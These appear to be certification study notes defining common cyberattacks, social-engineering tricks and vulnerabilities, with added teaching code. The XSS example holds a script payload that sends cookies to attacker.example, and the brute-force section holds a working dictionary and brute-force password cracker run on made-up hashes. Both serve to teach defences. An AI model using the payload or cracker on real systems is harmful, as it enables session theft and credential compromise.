2.4 Explain common social-engineering attacks, threats, and vulnerabilities.
Dictionary attack
A dictionary attack is a type of cyberattack that tries each entry of a list of known words, phrases, or commonly used passwords as a candidate password or encryption key in order to gain access to a system or data. Unlike a brute-force attack, it tests only likely candidates, so it finishes quickly but misses any password that is not on the list.
Zero-day attack
A zero-day attack is a type of cyberattack that exploits a previously unknown vulnerability in software or hardware before the vendor or developer has a chance to patch it, leaving systems vulnerable.
Evil twin
An evil twin is a type of social engineering attack that involves setting up a fake wireless access point that looks similar to a legitimate access point to trick victims into connecting to the attacker's network, enabling the attacker to steal sensitive information or perform other nefarious activities.
Insider threat
An insider threat is a type of cyberthreat that involves malicious or unintentional actions by an authorized user of a system or network that can result in harm to the organization, such as theft or sabotage of data.
On-path attack
An on-path attack is a type of cyberattack that intercepts or modifies communication between two parties, allowing the attacker to eavesdrop on or manipulate the communication for nefarious purposes.
Bring your own device (BYOD)
Bring your own device (BYOD) refers to the practice of employees using their personal devices for work-related purposes, which can increase the risk of security vulnerabilities if those devices are not properly secured or managed.
Cross-site scripting (XSS)
Cross-site scripting is a type of cyberattack in which an attacker injects malicious script into a web page that other users view. Because the script runs in the victim's browser with the victim's session, the attacker can steal session cookies or other data, take over user accounts, or alter the page's content.
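As an added illustration (not code from the original page), the snippet below shows the defect that makes XSS possible and the fix. A hypothetical comment feature concatenates user input straight into HTML; the hardened version encodes the input for its HTML context, and for an attribute context also restricts the URL scheme so a javascript: link is rejected. The payload and the page fragment are constructed samples.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input: a script that exfiltrates the viewer's cookie.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted text pasted into HTML: any <script> inside it is executed
    by every browser that renders the page."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """HTML text context: encode <, >, &, and quotes so the browser treats
    the input as inert text rather than markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_profile_link_safe(display_name: str, url: str) -> str:
    """HTML attribute context: always quote the attribute, escape quotes in
    the value, and allow only http(s) so a javascript: URL cannot run."""
    if urlparse(url).scheme not in ("http", "https"):
        url = "#"  # assumed policy for this example: drop unsafe schemes
    return (
        f'<a href="{html.escape(url, quote=True)}">'
        f'{html.escape(display_name, quote=True)}</a>'
    )


def contains_active_script(rendered: str) -> bool:
    """Crude check used here only to demonstrate the difference: a literal
    <script tag survives in the vulnerable output but not in the escaped one."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_profile_link_safe("profile", "javascript:alert(1)"))
```

The rule the example demonstrates is output encoding per context: the same input needs different treatment in a text node, in a quoted attribute, and in a URL, and escaping alone does not neutralize a javascript: scheme in an href.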
Spoofing
Spoofing is a type of cyberattack in which an attacker forges identifying information, such as a sender email address, IP address, MAC address, or caller ID, so that a communication from an unknown source appears to come from a known, trusted source, in order to gain unauthorized access to systems or data.
Tailgating
Tailgating is a type of social engineering attack in which an attacker follows closely behind an authorized person through a secured door or gate to enter a restricted area without presenting their own credentials.
Unpatched systems
Unpatched systems are systems that have not been updated with the latest security patches and updates, potentially leaving them vulnerable to cyberattacks or other security risks.
Unprotected systems (missing antivirus/missing firewall)
Unprotected systems are systems that lack essential security measures such as antivirus software or firewalls, leaving them vulnerable to cyberattacks or other security risks.
Vishing
Vishing is a type of social engineering attack that involves using voice calls to trick victims into revealing sensitive information or performing actions that can be used for nefarious purposes.
Whaling
Whaling is a type of social engineering attack that targets high-level executives or other important individuals to obtain sensitive information or gain unauthorized access to a system.
Vulnerabilities
A vulnerability is a fault or weakness in a system that a threat actor could exploit. Common causes include improperly configured or installed hardware or software; delays in applying and testing software and firmware patches; untested patches; misuse of software or communication protocols; poorly designed network architecture; inadequate physical security; insecure password usage; and design flaws in software or operating systems, such as unchecked user input.
Dumpster diving
Dumpster diving is a type of social engineering attack that involves an attacker searching through a victim's trash or recycling to obtain sensitive information, such as passwords, bank statements, or other confidential data.
EOL OSs
EOL (End-of-Life) OSs are operating systems that are no longer supported by their developers or vendors, leaving them vulnerable to security risks and exploits that are not being patched.
Impersonation
Impersonation is a type of social engineering attack that involves an attacker pretending to be a trusted entity, such as an IT support technician, to trick victims into divulging sensitive information or performing actions that can be used for nefarious purposes.
Non-compliant systems
Non-compliant systems are systems that do not meet the security standards or policies set forth by an organization, potentially leaving them vulnerable to cyberattacks or other security risks.
Phishing
Phishing is a type of social engineering attack that uses fraudulent emails, text messages, or look-alike websites impersonating a trusted entity to trick victims into revealing sensitive information such as credentials or payment details.
Threats
A threat is the potential for an entity (a threat actor) to exercise a vulnerability, that is, to breach security. An external threat actor has no account or authorized access to the target system and must infiltrate it using malware and/or social engineering. An insider threat actor has been granted permissions on the system; this typically means an employee, but insider threats can also arise from contractors and business partners.
Structured Query Language (SQL) Injection
SQL injection is a type of cyberattack against applications that build SQL queries by concatenating untrusted input (such as form fields or URL parameters) into the query text. By supplying input that contains SQL syntax, an attacker changes the meaning of the query and can read, modify, or delete data or bypass authentication.
Shoulder surfing
Shoulder surfing is a type of social engineering attack that involves an attacker looking over a victim's shoulder to obtain sensitive information, such as passwords, PINs, or other confidential data.
Social engineering
Social engineering is the practice of using psychological manipulation to trick people into divulging sensitive information or performing actions that can be used for nefarious purposes.
Brute-force attack
A brute-force attack is a type of cyberattack that tries every possible password or encryption key until the correct one is found, allowing the attacker to gain access to a system or data. It always succeeds eventually, but it is only practical when the key space is small (short passwords, a limited character set) or when the target can be tested very quickly, for example against a fast, unsalted hash copied from a breached database.
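As an added example covering both the dictionary attack and the brute-force attack described above (this is illustrative code, not from the original page), the script below attacks a constructed "password database" of salted SHA-256 hashes: a dictionary pass first tries a short wordlist, and anything it misses is handed to an exhaustive search over lowercase letters and digits up to three characters. The salt, users, passwords, and wordlist are all made up for the example; the storage format is an assumption about a weak service, chosen because a fast hash like SHA-256 is exactly what makes offline guessing cheap.

```python
import hashlib
import itertools
import string


def hash_password(password: str, salt: bytes) -> str:
    """Assumed storage scheme: hex(SHA-256(salt || password)). Fast hashes
    like this are what make offline guessing practical."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


# Constructed sample data.
SALT = b"\x01\x02\x03\x04"
STORED = {
    "alice": hash_password("sunshine", SALT),       # appears in the wordlist
    "bob": hash_password("zq7", SALT),              # short: brute-forceable
    "carol": hash_password("Tr0ub4dor&3x", SALT),   # neither
}
WORDLIST = ["123456", "password", "qwerty", "sunshine", "letmein"]


def dictionary_attack(target_hash: str, salt: bytes, wordlist):
    """Try only the candidates on the list; cheap, but misses anything else."""
    for word in wordlist:
        if hash_password(word, salt) == target_hash:
            return word
    return None


def brute_force(target_hash: str, salt: bytes,
                alphabet: str = string.ascii_lowercase + string.digits,
                max_len: int = 3):
    """Enumerate every string over `alphabet` up to `max_len` characters.
    Returns (password or None, number of hashes computed)."""
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if hash_password(candidate, salt) == target_hash:
                return candidate, attempts
    return None, attempts


def crack_all(stored: dict, salt: bytes, wordlist) -> dict:
    """Dictionary first, brute force as fallback; report how each was found."""
    results = {}
    for user, digest in stored.items():
        word = dictionary_attack(digest, salt, wordlist)
        if word is not None:
            results[user] = ("dictionary", word)
            continue
        password, _ = brute_force(digest, salt)
        results[user] = ("brute-force", password) if password else ("uncracked", None)
    return results


if __name__ == "__main__":
    for user, (method, password) in crack_all(STORED, SALT, WORDLIST).items():
        print(f"{user}: {method} -> {password}")
```

The attempt counter shows the cost difference: the dictionary finds alice's password in four hashes, bob's three-character password costs tens of thousands, and carol's long mixed-character password is out of reach for the three-character search entirely. Slowing the hash (bcrypt, scrypt, Argon2) raises every one of those counts by a large constant factor, which is why it is the standard defense.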
Distributed denial of service (DDoS)
A DDoS attack is a DoS attack launched from many sources at once, typically a botnet of compromised machines, flooding the targeted system or network with traffic so that it becomes unavailable to users; because the traffic arrives from many addresses, it is much harder to block by filtering a single source.
Denial of service (DoS)
A DoS attack is any cyberattack that makes a targeted system or network unavailable to its legitimate users, for example by flooding it with traffic from a single source, or by sending malformed input that crashes the service or exhausts its memory, CPU, or connection capacity.